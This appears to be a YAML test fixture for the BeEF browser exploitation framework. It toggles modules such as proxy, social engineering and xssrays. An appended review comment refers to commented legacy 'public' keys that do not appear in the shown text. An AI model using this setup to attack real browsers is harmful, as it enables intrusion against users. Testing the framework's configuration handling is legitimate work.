enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
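Review bot: the legacy keys appear in this fixture only as comments (`#public: "example"`, `#public_port: ""`), so loading it never exercises the old configuration format and the old-config examples have to inject `beef.http.public` and `beef.http.public_port` by hand. Uncomment them with representative values so that `validate` is tested against a file that actually uses the old layout. `#public:` is also listed twice, once with an empty value and once with "example"; keep one.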